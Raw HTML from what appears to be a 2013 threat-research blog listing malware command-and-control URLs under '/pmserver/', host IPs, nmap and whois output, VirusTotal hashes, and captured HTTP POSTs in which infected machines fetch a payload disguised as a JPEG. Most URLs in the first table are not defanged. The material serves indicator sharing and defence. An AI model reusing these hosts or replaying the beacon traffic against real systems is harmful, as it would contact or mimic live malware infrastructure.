<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-30 19:26:09</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1692249" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://geographic-channel.com/pmserver/browse.php">http://geographic-channel.com/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-30 19:22:41</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1692162" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://hotels2013.org/pmserver/browse.php">http://hotels2013.org/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-30 19:22:38</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1692161" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://hotels2013.org/pmserver/browse.php">http://hotels2013.org/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-29 17:55:07</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 1</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1676700" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://printing-offices.com/pmserver/backget.php">http://printing-offices.com/pmserver/backget.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-28 14:14:10</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1657525" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://geographic-channel.com/pmserver/browse.php">http://geographic-channel.com/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-28 08:12:55</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1649233" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://hotels2013.org/pmserver/browse.php">http://hotels2013.org/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 17:57:39</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1636939" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://adverts2013.com/pmserver/get.php">http://adverts2013.com/pmserver/get.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 16:48:43</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1635826" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://hotels2013.org/pmserver/browse.php">http://hotels2013.org/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 16:45:52</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1635803" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://adverts2013.com/pmserver/get.php">http://adverts2013.com/pmserver/get.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 14:31:09</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1634235" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://powersock2014.com/pmserver/file.php">http://powersock2014.com/pmserver/file.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 14:22:58</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1633859" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://printing-offices.com/pmserver/get.php">http://printing-offices.com/pmserver/get.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 14:18:14</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1633685" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://printing-offices.com/pmserver/backget.php">http://printing-offices.com/pmserver/backget.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 13:59:13</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1632917" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://hotels2013.org/pmserver/browse.php">http://hotels2013.org/pmserver/browse.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="even_highlight" style="background-color: #d9dfe6; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 07:49:40</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1626001" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://adverts2013.com/pmserver/get.php">http://adverts2013.com/pmserver/get.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
<tr class="odd_highlight" style="background-color: #ced6df; border: 1px solid rgb(89, 109, 136); margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><nobr></nobr><br />
<center>
<nobr>
2013-03-27 04:33:37</nobr></center>
<nobr>
</nobr></td><td align="center" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><b style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">0 / 0</b></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; vertical-align: baseline;"><a href="http://urlquery.net/report.php?id=1624081" style="background-color: transparent; color: black; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="http://adverts2013.com/pmserver/get.php">http://adverts2013.com/pmserver/get.php</a></td><td style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 3px; text-align: center; vertical-align: baseline;"><img align="left" height="11" src="http://urlquery.net/images/flags/il.png" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: middle;" title="Israel" width="16" />213.57.77.220</td></tr>
</tbody></table>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">PORT STATE SERVICE VERSION</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">80/tcp open http nginx 1.2.7</span></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<br />
<pre><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">inetnum: 178.175.139.32 - 178.175.139.63
netname: VPSCORNER-NET
descr: VPSCorner
country: MD
admin-c: CC11822-RIPE
tech-c: CC11822-RIPE
status: ASSIGNED PA
mnt-by: TRABIA-MNT
changed: noc@trabia.net 20130318
source: RIPE</span></pre>
<br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<i><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">Submitted.</span></i><br />
<br />
<b><span style="font-size: large;">Web Traffic:</span></b><br />
<br />
POST /pmserver/browse.php HTTP/1.1<br />
Accept: */*<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Host: hotels2013.org<br />
Content-Length: 119<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.2.7<br />
Date: Tue, 26 Mar 2013 13:29:45 GMT<br />
Content-Type: application/octet-stream<br />
Content-Length: 26704<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.23-1~dotdeb.0<br />
Cache-Control: public<br />
Content-Disposition: attachment; filename="%2e/files/ftc.jpg"<br />
Content-Transfer-Encoding: binary<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL9zrP4BT2YoBe8fhxIzySX0POPmpSdxYS_xwiven0LFZDs2XRSeTsaTsXtetRY5-cKk6hGVE4r8DHmrvO06fF9lvRIK6NaI8DAS-Y7iIz1W0QaXivF4LcJSxt7oDKw6MaQIlhJLYjqAs/s1600/pmserver.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL9zrP4BT2YoBe8fhxIzySX0POPmpSdxYS_xwiven0LFZDs2XRSeTsaTsXtetRY5-cKk6hGVE4r8DHmrvO06fF9lvRIK6NaI8DAS-Y7iIz1W0QaXivF4LcJSxt7oDKw6MaQIlhJLYjqAs/s640/pmserver.PNG" width="640" /></a></div>
<br />
<br />
<br />
POST /pmserver/get.php HTTP/1.1<br />
Accept: */*<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Host: adverts2013.com<br />
Content-Length: 380<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.2.7<br />
Date: Tue, 26 Mar 2013 13:30:16 GMT<br />
Content-Type: text/html<br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUFvJpVb_ptcmZphfY19QKVjWkxDYw0RvcqieKPNFuSkgWDfpmy8G03MqNLedhhJhDiffhQiC3SIXonCuUemWJBq6u8k6ki5TmHM_wJcUJ7K3hE03QBgeMhW-yAmzOZRo0o1DV3rmXpeg/s1600/get.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUFvJpVb_ptcmZphfY19QKVjWkxDYw0RvcqieKPNFuSkgWDfpmy8G03MqNLedhhJhDiffhQiC3SIXonCuUemWJBq6u8k6ki5TmHM_wJcUJ7K3hE03QBgeMhW-yAmzOZRo0o1DV3rmXpeg/s1600/get.png" /></a></div>
<br />
<br />
<br />
POST /pmserver/get.php HTTP/1.1<br />
Accept: */*<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Host: adverts2013.com<br />
Content-Length: 253<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.2.7<br />
Date: Tue, 26 Mar 2013 13:30:29 GMT<br />
Content-Type: text/html<br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.23-1~dotdeb.0<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<b><span style="font-size: large;">VT</span></b><br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">pon.exe</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class="
text-red " style="color: #b40c1a; padding: 8px 10px 9px;">4 / 45</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2013-03-26 16:12:47 UTC ( 1 minute ago )</td></tr>
</tbody></table>
<br />
<br />
<a href="https://www.virustotal.com/en/file/98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8/analysis/1364314367/">https://www.virustotal.com/en/file/98a822051873c177dd4af1c387754abba8ad510ec38edb807fc0a42e2cacb1c8/analysis/1364314367/</a><br />
<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;"><br />
SHA256:</td><td style="padding: 8px 10px 9px;">fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">fedex_trk_61293150511865307217.scr</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class="
text-red " style="color: #b40c1a; padding: 8px 10px 9px;">8 / 46</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2013-03-26 01:49:15 UTC ( 14 hours, 3 minutes ago )</td></tr>
</tbody></table>
<br />
<a href="https://www.virustotal.com/en/file/fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc/analysis/">https://www.virustotal.com/en/file/fd7868f90757f63a092220a06f28ec2e500358d23c0ba6aae13bc61ff3b14ecc/analysis/</a><br />
<br />
<br />
<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">alfasp1alfa3.exe</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class="
text-red " style="color: #b40c1a; padding: 8px 10px 9px;">6 / 44</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2013-03-26 16:08:45 UTC ( 1 minute ago )</td></tr>
</tbody></table>
<br />
<a href="https://www.virustotal.com/en/file/f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154/analysis/1364314125/">https://www.virustotal.com/en/file/f10596fca058a7303c9d1c38ba54b84b8d535e680a26c17de6703888f23e7154/analysis/1364314125/</a><br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-81501301971628621582013-01-21T13:11:00.000-08:002013-01-21T13:11:09.451-08:00Research on /forum/links/columns.php<br />
<br />
<b>The current IP of choice is 91.224.135.20</b><br />
<br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; width: 128px;">
<colgroup><col span="2" style="width: 48pt;" width="64"></col>
</colgroup><tbody>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt; width: 48pt;" width="64">hxxp://bananamamor.ru:8080/forum/links/abc.php</td>
<td style="width: 48pt;" width="64">91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://bananamamor.ru:8080/forum/links/public_version.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://bananamamor.ru:8080/yahoo/index.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://belnialamsik.ru/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://belnialamsik.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://damagalko.ru/forum/links/public_version.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://damagalko.ru:8080/forum/links/public_version.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dekamerionka.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://demoralization.ru</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://demoralization.ru/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://demoralization.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dfudont.ru:8080/forum/links/column.php</td>
<td>91.224.135.20</td>
</tr>
<tr height="20" style="height: 15.0pt;">
